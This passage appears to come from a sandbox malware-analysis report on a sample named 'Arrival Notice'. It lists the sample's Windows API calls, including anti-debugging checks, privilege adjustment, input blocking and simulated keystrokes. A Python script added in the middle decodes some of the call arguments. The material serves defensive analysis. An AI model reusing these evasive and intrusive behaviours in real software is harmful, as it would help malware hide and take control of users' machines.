                  • Instruction Fuzzy Hash: 02317C70908295DFCB12DF6A9C8196EFBBCBF46310B2547AAE051EB2B1D7309902CB54
                  APIs
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 0042CE89
                  • GetLastError.KERNEL32(?,00000000), ref: 0042CEEA
                  • SetEvent.KERNEL32(?,?,00000000), ref: 0042CEFE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorEventFileInternetLastRead
                  • String ID:
                  • API String ID: 234945975-0
                  • Opcode ID: b0aea7792b5af495f2658aa672eb278ef22b11f772206e0f7adeee9423802b1f
                  • Instruction ID: 2621821571c5a0eb892a013167067bf35035ed9dc420d5d1674c39de42e44768
                  • Opcode Fuzzy Hash: b0aea7792b5af495f2658aa672eb278ef22b11f772206e0f7adeee9423802b1f
                  • Instruction Fuzzy Hash: 4C21E0716007159BD720DFA5E984BAB77F8EB00318F51442FE64692291E778EE04CB58
                  APIs
                  • FindFirstFileW.KERNEL32(?,?), ref: 00425CC1
                  • FindNextFileW.KERNEL32(00000000,?), ref: 00425D17
                  • FindClose.KERNEL32(?), ref: 00425D5F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Find$File$CloseFirstNext
                  • String ID:
                  • API String ID: 3541575487-0
                  • Opcode ID: c20a5d3fd6ee07cffa4c19769f981a5adf517906ad26f3aa1001b12389ac9ce8
                  • Instruction ID: aad2201b8baff7472db2291394a198d7ef49398ec59c9de567a7e9a6224ab29e
                  • Opcode Fuzzy Hash: c20a5d3fd6ee07cffa4c19769f981a5adf517906ad26f3aa1001b12389ac9ce8
                  • Instruction Fuzzy Hash: 7C519835704A019FC714CF28D494A9AB7E4FF4A314F54855EEA5A8B3A2CB34EC05CB95
                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 003E271A
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003E2724
                  • UnhandledExceptionFilter.KERNEL32(?), ref: 003E2731
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: fb468ec9c9a9de9b72ef51add64400d8b434c3f585dd8b0c4af80a4287488427
                  • Instruction ID: f37996db0eca6f22ebde675baae135f2bbf4c3e1b6a28a89e71091dd54e2b402
                  • Opcode Fuzzy Hash: fb468ec9c9a9de9b72ef51add64400d8b434c3f585dd8b0c4af80a4287488427
                  • Instruction Fuzzy Hash: C131B5759112289BCB22DF65DC8979DB7B8BF08710F5042EAE81CA7261E7709F818F45
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 004251DA
                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00425238
                  • SetErrorMode.KERNEL32(00000000), ref: 004252A1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorMode$DiskFreeSpace
                  • String ID:
                  • API String ID: 1682464887-0
                  • Opcode ID: 93d91270bef7e043cc17b384e0ad401fa7be7d6b07ba3081777eb5bb033284dd
                  • Instruction ID: 918472a40104f62bbf94d31023e04143bf8196f4814b7322b039124cd531ddd4
                  • Opcode Fuzzy Hash: 93d91270bef7e043cc17b384e0ad401fa7be7d6b07ba3081777eb5bb033284dd
                  • Instruction Fuzzy Hash: 15317F75A00518DFDB00DF54D8C4EADBBB4FF49318F588099E9059B392DB35E845CB64
                  APIs
                    • Part of subcall function 003CFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 003D0668
                    • Part of subcall function 003CFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 003D0685
                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041170D
                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0041173A
                  • GetLastError.KERNEL32 ref: 0041174A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                  • String ID:
                  • API String ID: 577356006-0
                  • Opcode ID: 8d21c457cca7846faff0d19f60a2dcabeb750c7c976fecf639d78efdb0bc3d93
                  • Instruction ID: 7c7074616bcf81ae5043a880052a6c54e4bbcc1acc622a1374834b413674851f
                  • Opcode Fuzzy Hash: 8d21c457cca7846faff0d19f60a2dcabeb750c7c976fecf639d78efdb0bc3d93
                  • Instruction Fuzzy Hash: 0E11CEB2400304AFD718AF54DCCAEABB7B9EF04714B24852EE05697291EB70BC818B64
                  APIs
                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0041D608
                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0041D645
                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0041D650
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CloseControlCreateDeviceFileHandle
                  • String ID:
                  • API String ID: 33631002-0
                  • Opcode ID: 215bce6efab622cd31607deee73d497949dd50928f2770d41e824e8ac4f7644d
                  • Instruction ID: 809e17b7a7c2a585db22c5f2ce7c27916d9e24222f47ce60b785c84ffc5b7675
                  • Opcode Fuzzy Hash: 215bce6efab622cd31607deee73d497949dd50928f2770d41e824e8ac4f7644d
                  • Instruction Fuzzy Hash: 0E1182B5E01228BFDB108F94DC45FEFBBBCEB45B50F104122F904E7290C2705A018BA5
                  APIs
                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0041168C
                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004116A1
                  • FreeSid.ADVAPI32(?), ref: 004116B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID: AllocateCheckFreeInitializeMembershipToken
                  • String ID:
                  • API String ID: 3429775523-0
                  • Opcode ID: 04f1f4fcc5b202044781c401a4edbfc8b7f7a5199a9aa8e777ab426f82c4e652
                  • Instruction ID: 129a3d9ed843246a94494103c74f747428fef0d2a03c670ccbed161c2a126615
                  • Opcode Fuzzy Hash: 04f1f4fcc5b202044781c401a4edbfc8b7f7a5199a9aa8e777ab426f82c4e652
                  • Instruction Fuzzy Hash: 3BF04475A41308FBDB00CFE08C89EAEBBBCEB08200F004861E500E2180E334AA448A58
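The two records above (CreateFileW followed by DeviceIoControl, and AllocateAndInitializeSid followed by CheckTokenMembership and FreeSid) print their arguments as raw hex. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses lines in the report's "Name.MODULE(args), ref: ADDR" form and decodes the arguments that matter. 0x002D1400 splits by the CTL_CODE layout into device type 0x2D (FILE_DEVICE_MASS_STORAGE), function 0x500, METHOD_BUFFERED and FILE_ANY_ACCESS, which is IOCTL_STORAGE_QUERY_PROPERTY; the 0xC-byte input and 0x28-byte output buffers match the sizes of STORAGE_PROPERTY_QUERY and the STORAGE_DEVICE_DESCRIPTOR header, so this is a disk-property query (the device path itself is unresolved, shown as "?"). Sub-authorities 0x20 and 0x220 rebuild to S-1-5-32-544 (BUILTIN\Administrators), which makes the CheckTokenMembership call the canonical "is the caller an administrator" test. Assumptions: the identifier-authority argument is also "?" in the report, so the NT authority (5) is assumed; the name tables cover only the values these records use. Triage caveat: the report flags the sample as a compiled AutoIt script, and both sequences are consistent with what the AutoIt runtime does for its own built-ins (drive-property queries and IsAdmin()), so they describe interpreter capability rather than necessarily what the embedded script does.

```python
"""Decode the argument lists Joe Sandbox prints for Win32 API calls.
Added example, not from the report or the sample: parses lines of the
form "Name.MODULE(arg, ...), ref: ADDR", decodes CreateFileW /
DeviceIoControl flags and the SID built by AllocateAndInitializeSid.
Assumption: NT identifier authority (5), shown as "?" in the report.
Name tables hold only the values these records need."""
import re
from dataclasses import dataclass

# "ExitProcess.KERNEL32 ref: 003D4D22" has no argument list, so parens are optional.
API_LINE = re.compile(
    r"^(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list  # int for hex literals, None for '?', str for symbols
    ref: int

def parse_api_line(line: str) -> ApiCall:
    """Parse one report line; '?' marks a value not resolved statically."""
    m = API_LINE.match(line.strip().lstrip("•").strip())
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    args = []
    for tok in filter(None, (t.strip() for t in (m.group("args") or "").split(","))):
        if tok == "?":
            args.append(None)
        elif re.fullmatch(r"[0-9A-Fa-f]+", tok):
            args.append(int(tok, 16))
        else:
            args.append(tok)  # e.g. Function_000209E1
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))

ACCESS = {0x80: "FILE_READ_ATTRIBUTES", 0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
DEVICE_TYPES = {0x2D: "FILE_DEVICE_MASS_STORAGE"}
IOCTL_NAMES = {(0x2D, 0x500): "IOCTL_STORAGE_QUERY_PROPERTY"}
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")
IOCTL_ACCESS = ("FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS", "FILE_READ_ACCESS|FILE_WRITE_ACCESS")

def flag_names(value: int, table: dict) -> list:
    """Expand a bit mask into names; unknown bits are kept as one hex remainder."""
    names = [n for bit, n in table.items() if value & bit]
    rest = value & ~sum(table)
    return names + ([f"0x{rest:X}"] if rest else [])

def decode_create_file(call: ApiCall) -> dict:
    """CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSA, dwCreationDisposition, dwFlags, hTemplate)."""
    access, share, _sa, disp, attrs = call.args[1:6]
    return {"access": flag_names(access, ACCESS), "share": flag_names(share, SHARE),
            "disposition": DISPOSITION.get(disp, f"0x{disp:X}"),
            "attributes": "FILE_ATTRIBUTE_NORMAL" if attrs == 0x80 else f"0x{attrs:X}"}

def decode_ioctl(code: int) -> dict:
    """Undo CTL_CODE(DeviceType, Function, Method, Access): bits 31..16, 13..2, 1..0, 15..14."""
    dev, func = (code >> 16) & 0xFFFF, (code >> 2) & 0xFFF
    return {"device_type": DEVICE_TYPES.get(dev, f"0x{dev:X}"), "function": func,
            "method": METHODS[code & 3], "access": IOCTL_ACCESS[(code >> 14) & 3],
            "name": IOCTL_NAMES.get((dev, func), "unknown")}

WELL_KNOWN_SIDS = {"S-1-5-32-544": "BUILTIN\\Administrators"}
def sid_from_args(call: ApiCall, authority: int = 5) -> str:
    """Rebuild the SID from (pIdentifierAuthority, nSubAuthorityCount, sub0..sub7, ppSid)."""
    count = call.args[1]
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in call.args[2:2 + count]))

REPORT_LINES = [  # copied from the API records in this report
    "• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0041D608",
    "• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0041D645",
    "• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0041168C",
    "• ExitProcess.KERNEL32 ref: 003D4D22",
]

def summarize(lines: list = REPORT_LINES) -> dict:
    """Decode each known call; anything else is returned with its raw argument list."""
    out = {}
    for call in map(parse_api_line, lines):
        if call.name == "CreateFileW":
            out[call.name] = decode_create_file(call)
        elif call.name == "DeviceIoControl":
            d = decode_ioctl(call.args[1])
            d["in_size"], d["out_size"] = call.args[3], call.args[5]  # 12 and 40 bytes here
            out[call.name] = d
        elif call.name == "AllocateAndInitializeSid":
            sid = sid_from_args(call)
            out[call.name] = (sid, WELL_KNOWN_SIDS.get(sid, "unknown"))
        else:
            out[call.name] = call.args
    return out

if __name__ == "__main__":
    for name, decoded in summarize().items():
        print(f"{name}: {decoded}")
```

Run it as a script to print the decoded records; to apply it to another report, paste further "APIs" lines into the list and extend the name tables with the IOCTLs and flags those calls use.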
                  APIs
                  • GetCurrentProcess.KERNEL32(003E28E9,?,003D4CBE,003E28E9,004788B8,0000000C,003D4E15,003E28E9,00000002,00000000,?,003E28E9), ref: 003D4D09
                  • TerminateProcess.KERNEL32(00000000,?,003D4CBE,003E28E9,004788B8,0000000C,003D4E15,003E28E9,00000002,00000000,?,003E28E9), ref: 003D4D10
                  • ExitProcess.KERNEL32 ref: 003D4D22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: 9d6e8dfea2b8a99700c44f0c7f9da4527f3c10df50e4c27e392a308750424c5d
                  • Instruction ID: 97a70de6be0737f21468fe5f7a241a02765907e3757f40bd5d2fb5621df65010
                  • Opcode Fuzzy Hash: 9d6e8dfea2b8a99700c44f0c7f9da4527f3c10df50e4c27e392a308750424c5d
                  • Instruction Fuzzy Hash: 9DE0B636001188ABCF62AF64ED49A583B6AEB42781B194025FC058B223CB35DD42CA84
                  APIs
                  • GetUserNameW.ADVAPI32(?,?), ref: 0040D28C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID: NameUser
                  • String ID: X64
                  • API String ID: 2645101109-893830106
                  • Opcode ID: 31f8b799ec0fc15876545c27a060af284dd06cf6313867375b784b75d5b06693
                  • Instruction ID: f564cf449ce8760f113ca3a3326043111e8d0079c2f6950c52e135dfd9f2c3da
                  • Opcode Fuzzy Hash: 31f8b799ec0fc15876545c27a060af284dd06cf6313867375b784b75d5b06693
                  • Instruction Fuzzy Hash: 76D0C9B480212DEBCB90CB90DCC8DD9B37CBB04305F1001A6F106E2040D73495498F10
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                  • Instruction ID: 35b65b9d265bbdd2038f87d13e1fda87d5206ea6b75bb1b7fa07818f67613c77
                  • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                  • Instruction Fuzzy Hash: 95023E72E2011A9BDF15CFA9D9806ADFBF5EF48314F25416AE919EB380D731AD41CB80
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID: Variable is not of type 'Object'.$p#H
                  • API String ID: 0-701791887
                  • Opcode ID: 9589559b096a225e18426465e41251a690da23e58d147dbcbb3e0862e7beaf3a
                  • Instruction ID: 189798eda9a1a3d99b7bcef38411702722d0bfcd77157af16649ddbd32ee0541
                  • Opcode Fuzzy Hash: 9589559b096a225e18426465e41251a690da23e58d147dbcbb3e0862e7beaf3a
                  • Instruction Fuzzy Hash: 5032AF34910218DBDF25DF90C890BFEB7B9BF04308F14506AEA06BB682D775AD46CB64
                  APIs
                  • FindFirstFileW.KERNEL32(?,?), ref: 00426918
                  • FindClose.KERNEL32(00000000), ref: 00426961
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID: Find$CloseFileFirst
                  • String ID:
                  • API String ID: 2295610775-0
                  • Opcode ID: 2227bcd7d299694d6fd6424d0f593410623eb45853decf9d7717c9ed9072b05c
                  • Instruction ID: ebaf137c5975cfee39038b88a8219126cd5a951e0aa72a55859106e8701618fe
                  • Opcode Fuzzy Hash: 2227bcd7d299694d6fd6424d0f593410623eb45853decf9d7717c9ed9072b05c
                  • Instruction Fuzzy Hash: D411D0756042109FC710CF29D484A26BBE1FF85328F45C6AAF5698F7A2CB74EC45CB91
                  APIs
                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00434891,?,?,00000035,?), ref: 004237E4
                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00434891,?,?,00000035,?), ref: 004237F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID: ErrorFormatLastMessage
                  • String ID:
                  • API String ID: 3479602957-0
                  • Opcode ID: 1e0b71be4ad420a95eb8657b8a5dd6374f4b60e67eb625277388fd393c8307da
                  • Instruction ID: 4f7d2c5e150c7d149050753a5c908753ca8d7a2418d43570c8aaa6a16f3d892e
                  • Opcode Fuzzy Hash: 1e0b71be4ad420a95eb8657b8a5dd6374f4b60e67eb625277388fd393c8307da
                  • Instruction Fuzzy Hash: 64F0EC747053286BDB5017655C4DFEB7A6DEFC5761F000276F605D2291D9605904C6B4
                  APIs
                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0041B25D
                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0041B270
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID: InputSendkeybd_event
                  • String ID:
                  • API String ID: 3536248340-0
                  • Opcode ID: 2f077e0e39d018062a8adcc9392e0eb43bf15182594bf92684c9f337e6ca8a52
                  • Instruction ID: c5cac43685ed8e9fea23cdfd2924b9b138df958d48de3582f0a36ebc9a55e472
                  • Opcode Fuzzy Hash: 2f077e0e39d018062a8adcc9392e0eb43bf15182594bf92684c9f337e6ca8a52
                  • Instruction Fuzzy Hash: 78F06D7480424EABDB058FA0C805BEE7BB0FF04305F04805AF951A5191C37982059F98
                  APIs
                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004111FC), ref: 004110D4
                  • CloseHandle.KERNEL32(?,?,004111FC), ref: 004110E9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID: AdjustCloseHandlePrivilegesToken
                  • String ID:
                  • API String ID: 81990902-0
                  • Opcode ID: f7bfae7e85e4dee42614738eedb97b6b857061fd2c7f9e113cb9c34e2f1deb06
                  • Instruction ID: 0c0a114aecde7a6e5f3f49763501ce8714f259c931c55e4869997558e0259264
                  • Opcode Fuzzy Hash: f7bfae7e85e4dee42614738eedb97b6b857061fd2c7f9e113cb9c34e2f1deb06
                  • Instruction Fuzzy Hash: F2E04F32005610AEE7262B61FC09F737BA9EB04310B14882EF5A6844B1DB626C90DB54
                  APIs
                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003E6766,?,?,00000008,?,?,003EFEFE,00000000), ref: 003E6998
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  • Opcode ID: b1127e569afc0849a2e4837903d9a0051b0105170007842d5b475ceeb9130937
                  • Instruction ID: 636d81e8621c27ab3de95dbddf34988d159443d3d21284b06300da2de49054a3
                  • Opcode Fuzzy Hash: b1127e569afc0849a2e4837903d9a0051b0105170007842d5b475ceeb9130937
                  • Instruction Fuzzy Hash: 48B16B716106588FD716CF29C48AB657BE0FF153A4F268658E899CF2E2C335E981CB40
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: ec7e4203bff3b924680c1a5584585998f1748b9f72800baf978d19c937711491
                  • Instruction ID: f0386902d561634dbe8ef51fbcc2d278ec9b50e44eaa5f258eb712ff54c52d27
                  • Opcode Fuzzy Hash: ec7e4203bff3b924680c1a5584585998f1748b9f72800baf978d19c937711491
                  • Instruction Fuzzy Hash: F81282719002299BCB15CF59C981BEEB7B5FF48310F1481AEE849EB291EB349E41CF94
                  APIs
                  • BlockInput.USER32(00000001), ref: 0042EABD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID: BlockInput
                  • String ID:
                  • API String ID: 3456056419-0
                  • Opcode ID: 212f8158b108b3f9dc2968ef41b7e2ad052029a90ffedcddeefc4d284f05a4e8
                  • Instruction ID: 135e910c38c499c12b4a645ca221d2f805d36a6bda12c9a5dde523ff19e7f625
                  • Opcode Fuzzy Hash: 212f8158b108b3f9dc2968ef41b7e2ad052029a90ffedcddeefc4d284f05a4e8
                  • Instruction Fuzzy Hash: 74E09A312002109FC310EF5AE804E9AF7E8AFA9760F00802AFD0ACB350CAB0A8408B91
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,003D03EE), ref: 003D09DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 80ae16b843fa46f51126a3aacbe03e659fefe95c4cd3eec30804807695cf4842
                  • Instruction ID: f4079885e2b4ce754b4d2b261ca7a4f72429d99805c9e940b1ccc8606c123b64
                  • Opcode Fuzzy Hash: 80ae16b843fa46f51126a3aacbe03e659fefe95c4cd3eec30804807695cf4842
                  • Instruction Fuzzy Hash:
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID: 0
                  • API String ID: 0-4108050209
                  • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                  • Instruction ID: 4e9d06db489262a134a84ae43df13bd005e9e72ae06d983fc91df6ef59cad98a
                  • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                  • Instruction Fuzzy Hash: 3051577360C6455ADB3B4638B86B7FE63999B02340F19050BD886CB782F725EE05E356
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID: 0&H
                  • API String ID: 0-1626568196
                  • Opcode ID: 481238bbefd848d2e84b6650c451c8d68325d0ca98fb6f90cc1b4c241496f55a
                  • Instruction ID: 93556e3151eefdbb823c8a77451140b5daafd743d39d1ac154db4ee5c012459d
                  • Opcode Fuzzy Hash: 481238bbefd848d2e84b6650c451c8d68325d0ca98fb6f90cc1b4c241496f55a
                  • Instruction Fuzzy Hash: D721E7327206118BD728CF79C92367E73E5A754310F548A2EE5A7D73D0DE79A904CB84
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e07187057c0b84e14b680782ce5449b8761122ff6276ac00b1b98faa21e46151
                  • Instruction ID: 577e7f0b8963e70b304851a18a90c3988b1a234b410879652297168ad9aabaf8
                  • Opcode Fuzzy Hash: e07187057c0b84e14b680782ce5449b8761122ff6276ac00b1b98faa21e46151
                  • Instruction Fuzzy Hash: FD324522D29F914DD7239635DD22336A259AFB73C6F25C737E81AB59E6EB28C4834100
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 50bca7ff66a0ab75c50a2173fe688202a2f521be67ad350d60105c603a78a051
                  • Instruction ID: 63ba4236efa7602bd04d71f91cc9a2516df36deb0d899fa5eb1b7f9388db3144
                  • Opcode Fuzzy Hash: 50bca7ff66a0ab75c50a2173fe688202a2f521be67ad350d60105c603a78a051
                  • Instruction Fuzzy Hash: C232CF32A14115CBDF29CB28C4D4B7E77A1EB45300F29867BD85AEB3D1D2389D82DB49
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 69aa0af51c8c20b1b65f5947d71b1fe5956815960c523acc2c36e136eaadc988
